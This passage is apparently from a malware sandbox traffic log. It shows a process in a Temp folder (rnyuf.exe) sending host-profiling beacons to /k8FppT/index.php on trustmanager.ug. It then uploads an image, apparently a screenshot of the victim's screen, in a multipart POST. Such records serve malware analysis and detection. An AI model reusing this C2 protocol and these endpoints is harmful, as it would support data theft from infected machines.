6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:04.142592907 CEST	16253	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
74	192.168.2.3	49800	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:04.293025017 CEST	16255	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:04.319034100 CEST	16257	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:04.319050074 CEST	16257	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
75	192.168.2.3	49801	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:04.479715109 CEST	16258	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:04.505719900 CEST	16259	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:04.505764961 CEST	16259	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
76	192.168.2.3	49802	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:04.621953011 CEST	16260	OUT	POST /k8FppT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32 Host: trustmanager.ug Content-Length: 93811 Cache-Control: no-cache
Aug 23, 2021 02:09:04.622087955 CEST	16260	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 34 34 66 65 64 64 35 33 66 32 61 65 65 65 30 39 61 61 34 64 62 63 65 36 62 36 65 39 65 33 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------144fedd53f2aeee09aa4dbce6b6e9e32Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 23, 2021 02:09:04.622303009 CEST	16270	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 23, 2021 02:09:04.622482061 CEST	16273	OUT	Data Raw: fc b8 7d 9b c9 ce ef 61 bb 38 fc 36 fb d7 05 6e 78 a7 24 df de ff 00 c9 7e 67 55 3e 56 d2 b2 fc 3f cc f9 57 53 55 4d 4a 50 a0 01 90 70 3e 82 aa 55 cd 57 fe 42 53 7e 1f c8 55 3c 57 44 be 26 73 2d 84 a5 a5 a5 34 80 6d 14 b4 b8 a0 06 f6 a5 c5 3b 14 Data Ascii: }a86nx$~gU>V?WSUMJPp>UWBS~U<WD&s-4m;b1KN&(1K)h(bSEv1@;EE%bRPbbPRQv((PF)h4} wLT!Z,;SIVb\mbIv(SIV
Aug 23, 2021 02:09:04.647579908 CEST	16276	OUT	Data Raw: 96 28 a1 96 48 a4 48 e6 52 d1 3b 29 02 40 09 04 a9 ee 32 08 e3 b8 ac 29 50 a7 4a 72 94 34 6f 7f c4 b9 d4 9c e2 94 ba 11 d1 56 ae 34 db fb 48 9e 5b 9b 1b 98 63 49 8c 0e f2 42 ca 16 40 32 50 92 38 6c 73 8e b4 eb 6d 23 53 bc fb 3f d9 74 db c9 fe d2 Data Ascii: (HHR;)@2)PJr4oV4H[cIB@2P8lsm#S?tyP3, rq"KVn4BP}UEKtH=o*[67Vs#b`84]VZ$IN^4}BVd{D__k]Mq!{Ic-AuV2yo$d
Aug 23, 2021 02:09:04.647625923 CEST	16279	OUT	Data Raw: 78 46 54 8b c4 90 b1 96 28 66 30 ce b6 d2 ca c1 55 27 31 30 88 e4 f0 0e fd b8 27 a1 c1 ac 3a 08 04 60 d6 b2 57 8b 5d cc d3 b3 b9 e8 5e 1f d1 4e 91 3e 91 36 a7 69 ac 5a 5e ca 35 21 73 67 79 2e c3 22 8b 42 4c b1 ab 46 0a ee ce dc 9d dc af 7e 95 04 Data Ascii: xFT(f0U'10':`W]^N>6iZ^5!sgy."BLF~<!kro2`OJw+ImZz<IxZG=vuP#Up=<tbUg$b;lo%3Q9]1{UXio
Aug 23, 2021 02:09:04.647633076 CEST	16284	OUT	Data Raw: c6 62 8a 7d 18 a2 c1 71 84 53 76 d4 98 a4 22 90 5c 8c 8a 42 2a 4c 53 71 4a c5 26 47 8a 4c 54 b8 a6 e2 a6 c5 5c 8f 14 62 a4 c5 37 14 ac 3b 8c c5 18 a7 d2 11 49 a1 dc 66 28 c5 2e 28 c5 2b 0e e3 48 a4 c5 3b 14 62 8b 00 cc 52 11 4f a4 c5 49 57 19 8a Data Ascii: b}qSv"\B*LSqJ&GLT\b7;If(.(+H;bROIW1OqAXbv))Rb7bE'zLRJ1@b(m8CK@"-BTF[#9Ss9B.Odg+jz}???XrWSG#V
Aug 23, 2021 02:09:04.647651911 CEST	16287	OUT	Data Raw: 6e 73 8c ef c6 58 1e bc e2 bc e2 0d 5f 55 b5 6b 43 6d 7c f0 9b 48 24 b7 80 c6 00 29 1c 9b 8b 8c e3 9c ef 6e 4f 23 3c 74 14 c5 d4 b5 24 b0 5b 15 bb c5 a8 b5 6b 41 1f 96 bf ea 9a 4f 34 ae 71 9f bf ce 7a f6 e9 c5 29 52 a9 b2 da ef f5 5f e5 f8 8d 54 Data Ascii: nsX_UkCm\|H$)nO#<t$[kAO4qz)R_T{/Yi[2jCcxg=[:vqFoH3k[2[WN3{f][VioK.f*U9cb97w7:>w1y<%)-?~mWd+5j
Aug 23, 2021 02:09:04.647696018 CEST	16292	OUT	Data Raw: 8a 5b 18 76 34 dd a7 d2 af f9 8a 7a 8a 5f dd 9f e1 a3 d9 f9 87 b4 7d 8c fe 73 4a 33 8a d0 f2 a2 34 1b 68 8f 7a 5e c9 87 b5 46 7d 2d 5c fb 18 ec d4 9f 63 6e c6 8f 65 21 fb 48 95 28 ab 06 d2 41 da 9a 6d e4 1d 8d 2e 46 35 38 f7 21 c5 18 a9 0c 6c 3f Data Ascii: [v4z_}sJ34hz^F}-\cne!H(Am.F58!l?vqb1E%/zP(.%-.(a\mQ`b1JQLBQE.K@)RsKZbRi:qER7)qE:bJ*+.)NQ~(bH9F3Rm>QsZiON
Aug 23, 2021 02:09:04.647726059 CEST	16294	OUT	Data Raw: d8 aa b9 a3 34 bd 9c 46 58 37 72 f7 6c fd 4d 1f 6b 97 1f 7b 1f 41 55 b3 4b 4f 92 3d 83 62 c1 b9 95 87 32 31 fc 69 a6 46 6e ac 4f d6 a3 a2 8e 48 f6 0b b2 55 72 0e 6b a5 bd bc 78 be 1a b7 cd cb cf b7 f0 ae 5f a0 ad 5d 62 5c 7c 3e 86 3f 5b 93 5c 38 Data Ascii: 4FX7rlMk{AUKO=b21iFnOHUrkx_]b\\|>?[\8'w`%iK)bCM:zj<vS@P7,IV~\2y>oH4k+}Xo`9*>i":L\W:DC IF#NmmdLgl[Z=)C
Aug 23, 2021 02:09:04.647772074 CEST	16299	OUT	Data Raw: a0 9f a0 1e b9 c3 9a ad bf ae df e6 6f cb 4a fb ff 00 57 ff 00 22 be ad 6d a4 ae 91 fd a9 a4 bd e1 b6 93 53 9a d2 11 72 ca 58 c4 89 19 0c 70 a3 e6 25 c9 fa 60 76 c9 d8 d5 7c 3d a5 e9 6b ac 32 45 a9 5f ad 95 ec b6 ce 6d a5 4d d6 48 a0 6c 92 65 d8 Data Ascii: oJW"mSrXp%`v\|=k2E_mMHleK+yFrxWc:}wqv.xIuvWRYx-{v}6iuE;~K(x?l/Wo.i10:<HTU=M^<9aZYi]Aen\|#x
Aug 23, 2021 02:09:04.725032091 CEST	16358	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 